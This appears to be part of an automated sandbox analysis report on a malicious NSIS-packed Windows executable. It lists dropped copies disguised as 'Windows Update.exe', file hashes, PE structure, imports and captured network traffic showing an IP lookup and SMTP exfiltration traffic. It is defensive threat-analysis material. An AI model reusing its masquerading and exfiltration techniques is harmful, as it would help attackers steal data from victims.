                                                                                            Entropy (8bit):6.52147420132688
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:MO9DZ1DVIbQwhPUfwNRcqz3+dpHquOt/l:MaN1JyQoPMa3+FSl
                                                                                            MD5:C16079C8EB03B8859CDFFD31F4137C80
                                                                                            SHA1:4F76339C9DE64C0D0943C06AD7FC4D499FB2ACBB
                                                                                            SHA-256:0C9930C5091E500AB5EDF26F6D3BA85BAB02C65DBDE677068B0943308F29FEAB
                                                                                            SHA-512:6B4864972150C271D45A58DD5F7CBCD2EADB691A62D65957A5B76DE1EAE7D00D7D996CBCD6EB45F20F6CFFA42AA68190DCA52E2D5A4324B8D9BA90E24BEE6404
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%]..v]..v]..vP.(v}..vP..vR..vP.)v3..vI..wD..v]..v,..v...w\..v...w\..v..6v\..v...w\..vRich]..v........PE..L....`.a...........!......................................................................@.................................d....................................... ...............................@...@............................................text............................... ..`.rdata..Jf.......h..................@..@.data....p... ...T..................@....rsrc................V..............@..@.reloc...............X..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):852277
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                            SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                            SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                            SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Roaming\Windows Update.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\Desktop\5.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):852277
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                            SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                            SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                            SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 31%
                                                                                            Reputation:unknown
                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Users\user\AppData\Roaming\WindowsUpdate.exe:Zone.Identifier
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Reputation:unknown
                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                            C:\Users\user\AppData\Roaming\pid.txt
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):1.5
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:bn:b
                                                                                            MD5:21F4C3B5591DA245AF90A2FD52FA1A55
                                                                                            SHA1:7BF446DEFE82C44EDADC2E74AF4FE0340C4602D9
                                                                                            SHA-256:FF2FBB2C3BFF60DDA45042CBC05BC633AFC1719B19A9E74C55988C48A78C2FC3
                                                                                            SHA-512:A8DEBFD0429625D27B38B421BA212F32B790120600620DBE97E0C9E701CDC5F8C5F046A1EBC061D8943270732731993DBAC16BC08A12854970598912E9EA7957
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: 6244
                                                                                            C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                            Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):50
                                                                                            Entropy (8bit):4.414177320667444
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:oNUkh4EaKC59KYr4a:oN9aZ534a
                                                                                            MD5:201BF2179D431C7E3205E5F410DCDB59
                                                                                            SHA1:3F774846910F70FC1BCC69DE05E8F9EA4D893F34
                                                                                            SHA-256:FBB871739943E63027102EF9DEECDFC261F94DD3FBB06087772EF705F182D13D
                                                                                            SHA-512:0047D87CC9E2C50FB2217A4F1200973B575D30195BE7DF04E2F6B494350178568338FAA802DBE41AA47EC64C5A5699AC66B88D8C821CF2DD1F0EF1B93446F0E4
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1572864
                                                                                            Entropy (8bit):4.268636026237426
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:nG116Z3J4hRWwpVWovqTiOJ2F/vHbuOLDEwKYjjf4Fd+TfcgWyDUS2Ne:G116Z3J4hRWwpVW9766e
                                                                                            MD5:28BD5B449A28F93626BAC751415841BB
                                                                                            SHA1:6906DA97F0C289DF382F3C502E27BD15FC374B1F
                                                                                            SHA-256:BA1A411241BC4D75B53D9536975A937FF480B6D2B70807860E2AD88369398FB9
                                                                                            SHA-512:B92181E4B0BBF8B5D72ACF9A5C6367EF27CFF6496D2CE86668D253B9F733C900A3E8E1211F862F1A3BC24BABA044DB021EE0C3F943E2DE69F14E4A9B7C484391
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: regfR...R...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................'..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):24576
                                                                                            Entropy (8bit):2.846479762672498
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:/ZsL5qXQn1Of2oXPmxwpSuN5WEl8HG9N5WEl8H:/i17Uf2oOxwp1N5v8HON5v8H
                                                                                            MD5:A44D4C3671BCCB3F12915FD40CCBDCFA
                                                                                            SHA1:A4A6DD83C82EEC282E42359FCBA43E48EAEDA192
                                                                                            SHA-256:7E81E687CEC608228065A11A5231B4C28022BDFA9393613A4B4ECC3260EF4960
                                                                                            SHA-512:4D1F1188549F64A721A02983A99FF4AC2D93697113DC6A1AD7680275DB13182DA59BE095AE73C4AD300C399F5EE672EC0A46860EB2ED06016F3077DB15BF2CA5
                                                                                            Malicious:false
                                                                                            Reputation:unknown
                                                                                            Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm....................................................................................................................................................................................................................................................................................................................................................!..HvLE.>......Q...........]_..K..,~h.g............................hbin................p.\..,..........nk,.+....................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .+........... ...........P............... .......Z.......................Root........lf......Root....nk .+........................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                            Entropy (8bit):7.535786145318411
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                            • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:5.exe
                                                                                            File size:852277
                                                                                            MD5:3f332b62eee0970f3189c689d5bd042a
                                                                                            SHA1:f68f7dcc8ffcdd3f93333e711779e8d02db2dfae
                                                                                            SHA256:7c7983ada08828ea0c0ed5b17b05f8dad5bf6fa44e1a4692c37f18c340e14219
                                                                                            SHA512:2399bf335b60b87d1126b7cd663dfd937be0da7fef815225d53940e5d01cf4b02969dc33d75e7b1f5f63b3233ed1ea179cc517c1c4639802293e4ea8cf25d5ef
                                                                                            SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                                                                            File Icon

                                                                                            Icon Hash:f0ec2e6e7ab68e70

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x4030e3
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                            DLL Characteristics:
                                                                                            Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:7fa974366048f9c551ef45714595665e

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            sub esp, 00000180h
                                                                                            push ebx
                                                                                            push ebp
                                                                                            push esi
                                                                                            xor ebx, ebx
                                                                                            push edi
                                                                                            mov dword ptr [esp+18h], ebx
                                                                                            mov dword ptr [esp+10h], 00409158h
                                                                                            xor esi, esi
                                                                                            mov byte ptr [esp+14h], 00000020h
                                                                                            call dword ptr [00407030h]
                                                                                            push 00008001h
                                                                                            call dword ptr [004070B0h]
                                                                                            push ebx
                                                                                            call dword ptr [0040727Ch]
                                                                                            push 00000008h
                                                                                            mov dword ptr [0042EC18h], eax
                                                                                            call 00007F8590EC94A8h
                                                                                            mov dword ptr [0042EB64h], eax
                                                                                            push ebx
                                                                                            lea eax, dword ptr [esp+34h]
                                                                                            push 00000160h
                                                                                            push eax
                                                                                            push ebx
                                                                                            push 00428F90h
                                                                                            call dword ptr [00407158h]
                                                                                            push 0040914Ch
                                                                                            push 0042E360h
                                                                                            call 00007F8590EC915Fh
                                                                                            call dword ptr [004070ACh]
                                                                                            mov edi, 00434000h
                                                                                            push eax
                                                                                            push edi
                                                                                            call 00007F8590EC914Dh
                                                                                            push ebx
                                                                                            call dword ptr [0040710Ch]
                                                                                            cmp byte ptr [00434000h], 00000022h
                                                                                            mov dword ptr [0042EB60h], eax
                                                                                            mov eax, edi
                                                                                            jne 00007F8590EC698Ch
                                                                                            mov byte ptr [esp+14h], 00000022h
                                                                                            mov eax, 00434001h
                                                                                            push dword ptr [esp+14h]
                                                                                            push eax
                                                                                            call 00007F8590EC8C40h
                                                                                            push eax
                                                                                            call dword ptr [0040721Ch]
                                                                                            mov dword ptr [esp+1Ch], eax
                                                                                            jmp 00007F8590EC69E5h
                                                                                            cmp cl, 00000020h
                                                                                            jne 00007F8590EC6988h
                                                                                            inc eax
                                                                                            cmp byte ptr [eax], 00000020h
                                                                                            je 00007F8590EC697Ch
                                                                                            cmp byte ptr [eax], 00000022h
                                                                                            mov byte ptr [eax+eax+00h], 00000000h

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x2c6a0.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                            .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x370000x2c6a00x2c800False0.231011894312data4.29448380541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountry
                                                                                            RT_ICON0x373100x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                            RT_ICON0x47b380x94a8dataEnglishUnited States
                                                                                            RT_ICON0x50fe00x5488dataEnglishUnited States
                                                                                            RT_ICON0x564680x46d5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                            RT_ICON0x5ab400x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 4294902528EnglishUnited States
                                                                                            RT_ICON0x5ed680x25a8dataEnglishUnited States
                                                                                            RT_ICON0x613100x10a8dataEnglishUnited States
                                                                                            RT_ICON0x623b80x988dataEnglishUnited States
                                                                                            RT_ICON0x62d400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                            RT_DIALOG0x631a80x100dataEnglishUnited States
                                                                                            RT_DIALOG0x632a80x11cdataEnglishUnited States
                                                                                            RT_DIALOG0x633c80x60dataEnglishUnited States
                                                                                            RT_GROUP_ICON0x634280x84dataEnglishUnited States
                                                                                            RT_MANIFEST0x634b00x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            12/07/21-18:17:50.901213TCP1201ATTACK-RESPONSES 403 Forbidden8049751104.16.155.36192.168.2.5

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 7, 2021 18:17:50.850095034 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:17:50.870978117 CET8049751104.16.155.36192.168.2.5
                                                                                            Dec 7, 2021 18:17:50.871078968 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:17:50.871639013 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:17:50.888890982 CET8049751104.16.155.36192.168.2.5
                                                                                            Dec 7, 2021 18:17:50.901212931 CET8049751104.16.155.36192.168.2.5
                                                                                            Dec 7, 2021 18:17:51.113161087 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:18:09.519908905 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:18:09.539020061 CET8049751104.16.155.36192.168.2.5
                                                                                            Dec 7, 2021 18:18:09.544150114 CET4975180192.168.2.5104.16.155.36
                                                                                            Dec 7, 2021 18:18:09.561613083 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:09.720175982 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:09.720853090 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:09.881150961 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:09.882308960 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.040512085 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.040832996 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.042723894 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.201702118 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.333462954 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.337486029 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.495537043 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497131109 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497147083 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497168064 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497181892 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497193098 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.497251034 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.497294903 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.524231911 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.682621002 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.683475971 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.743216038 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:10.901245117 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.901721001 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:10.902432919 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.060590029 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.062072992 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.062607050 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.220769882 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.223947048 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.224550962 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.383089066 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.385971069 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.389396906 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.547744989 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.576605082 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.724204063 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.809842110 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.968239069 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.968806982 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:11.969784021 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.969975948 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.970180988 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.970328093 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.970454931 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:11.970587969 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:12.127882004 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.127914906 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.128144026 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.128163099 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.128257990 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.128328085 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.136006117 CET5874976566.29.159.53192.168.2.5
                                                                                            Dec 7, 2021 18:18:12.224261045 CET49765587192.168.2.566.29.159.53
                                                                                            Dec 7, 2021 18:18:26.969449043 CET49765587192.168.2.566.29.159.53

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 7, 2021 18:17:50.769954920 CET6544753192.168.2.58.8.8.8
                                                                                            Dec 7, 2021 18:17:50.789781094 CET53654478.8.8.8192.168.2.5
                                                                                            Dec 7, 2021 18:18:09.537185907 CET6318353192.168.2.58.8.8.8
                                                                                            Dec 7, 2021 18:18:09.558381081 CET53631838.8.8.8192.168.2.5

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                            Dec 7, 2021 18:17:50.769954920 CET192.168.2.58.8.8.80xa183Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                            Dec 7, 2021 18:18:09.537185907 CET192.168.2.58.8.8.80x3860Standard query (0)smtp.privateemail.comA (IP address)IN (0x0001)

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                            Dec 7, 2021 18:17:50.789781094 CET8.8.8.8192.168.2.50xa183No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
